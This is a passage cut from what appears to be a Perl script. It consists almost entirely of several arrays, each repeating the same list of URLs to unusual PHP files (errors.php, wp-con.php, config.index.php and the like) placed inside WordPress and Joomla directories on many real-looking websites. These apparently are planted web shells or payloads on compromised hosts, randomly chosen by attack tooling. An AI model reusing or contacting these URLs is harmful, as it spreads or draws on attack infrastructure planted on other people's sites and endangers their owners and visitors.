"http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random2 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random3 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random4 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.psdf.org.pk/errors.php", "https://savannasolutions.co.zm/errors.php", "http://newpl.imul.pl/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://rpaisa.com/wp-con.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://ersaf.it/errors.php", "http://www.xinh-sushi.de/errors.php", "http://www.fhdynamics.com/errors.php", "http://cilfowyr.co.uk/errors.php", "http://www.scribbly.net/2013/errors.php", "http://www.dso.phpcmsmodx.info/core/components/elrte/testing//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://portalacademicounid.we-know.net/LearnDash/errors.php", "http://djltraining.trainingassociates.us/errors.php", "http://simplychristianbookclub.com/errors.php", "http://kellymarielane.com/more/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://allonymousbooks.com/errors.php", "http://www.crackbig.com/errors.php", "http://surgicalleadershipalliance.org/errors.php", "http://www.triadsquare.com/errors.php", "http://www.yogaeducational.org//errors.php", "http://www.dimensionetv.com//errors.php", "http://www.aubordduciel.fr/errors.php", "http://www.neuro-sono.med.br/errors.php", "http://condomini.caricato.eu/errors.php", "http://opieka.radom.pl/errors.php", "http://hevilemmetal.com.br/errors.php", "http://austerdigitalpunch.com/errors.php", "http://f.potolok.kg/errors.php", "http://fhdynamics.com/errors.php", "http://www.dimensionetv.com//errors.php", "http://www.fzzz.ba/phpthumb//errors.php", "http://www.fzzz.ba//errors.php", "http://www.descarsnc.it/errors.php", "http://www.veronikagazeau.com/errors.php", "http://www.teho.com.sg//errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "http://daniel123.co.za/errors.php", "http://hevilemmetal.com.br/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://batizandras.hu/errors.php", "http://training.beekmanresources.co.za/errors.php", "http://kellymarielane.com/more/errors.php", "http://core.sportandexercisemedicineacademy.co.uk/errors.php", "opieka.radom.pl/errors.php", "http://www.clinicalosfundadores.cl/errors.php", "http://martysautoandtowing.com/errors.php", "http://www.derrjob.com/errors.php", "http://www.ecolombiatours.com/errors.php", "http://www.infolor.fr/errors.php", "http://www.masfarne.info/errors.php", "http://fundacioncimientos.org/errors.php", "http://constructiidelemnpegas.ro/errors.php", "http://produkcja.rolnicy.com//components/com_wrapper/errors.php", "http://dominicanway.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.economicswork.ru//plugins/editors/errors.php", "http://lexiquedumanagement.com//components/com_alphacontent/assets/phpThumb/errors.php", "http://sellallmyideas.com/errors.php", "http://www.artiste-peintre-figuratif.com/huile-aquarelle//components/com_alphacontent/assets/phpThumb/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.ecomuseudelblat.cat/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://interminas.ddns.net/errors.php", "http://www.pebk.de/joomla/components/com_mailto/error.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.orfej.si/components/com_mailto/error.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php", "http://therfw.com/wp-includes/error.php", "http://bigbananawatch.com/wp-content/themes/bigbananawatch/error.php", "http://gobll.pl/errors.php", "http://www.yplittleport.org.uk/media/system/config.index.php", "http://greenpowerguy.com/blog/wp-content/themes/error.php", "http://ivanous.free.fr/camu_s_world/images/stories/jump.php", "http://www.austriasport.nl/wp-includes/errors.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.pessebristassumpcio.com/wp-includes/error.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php", "http://www.flowershop-neo.com/wp-includes/error.php", "http://www.mondragonlingua.com/formacion/components/com_users/search.php", "http://exhibcouples.fr/errors.php", "http://iheld.com/errors.php", "http://www.kathleenferrari.com/errors.php", "http://www.amslight.com/errors.php", "http://pastorbonus.sk/errors.php", "http://www.saboeiro.pt/errors.php", "http://hlmais.com.br/mundo/wp-content/themes/twentyten/error.php", "http://treboliberica.com/includes/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://imotionasia.com.vn/errors.php", "http://www.petropolis.rj.gov.br/intranet/components/com_mailto/error.php", "http://bioenfapesp.org/media/mailto/error.php", "http://www.tcfa1.net/errors.php", "http://dailyfresh.nu/errors.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.cchm.ca/components/com_mailto/error.php", "http://www.bortolotto.eu/plugins/editors/error.php", "http://www.gambinigroup.it/media/mailto/error.php", "http://zemnoe.ru/wp-includes/error.php", "http://politics.cnm.com.pt/errors.php", "http://www.thermona-ekb.ru/errors.php", "http://dailyfresh.nu/Hotfrog/errors.php", "http://www.thai-orchidea.cz/modules/mod_login/error.php" ); my @random5 = ("http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://rpaisa.com/wp-con.php", "http://www.jobsforfive.com/wp-admin/edit-link.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://newpl.imul.pl/errors.php", "http://theitaliancorner.co.uk/wp-includes/theme-compat/comments-footer.php", "http://www.vipesrl.it/gruppo/config.inc.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.cantalindustrie.com/wp/wp-content/themes/errors.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "https://www.cloudipalarm.nl/wp-content/plugins/revslider/temp/errors.php", "http://www.psdf.org.pk/errors.php", "http://www.ims.co.ke/errors.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://www.psdf.org.pk/errors.php", "http://fusildechispas.com/errors.php", "http://rpaisa.com/wp-con.php", "http://www.corteganamedieval.com/components/com_content/views/section/tmpl/page-sidebar.php", "http://www.flatertheek.nl/wp-includes/SimplePie/HTTP/search.php", "http://www.bendit.co/backside/media/mailto/error.php", "http://fusildechispas.com/errors.php", "http://www.psdf.org.pk/errors.php", 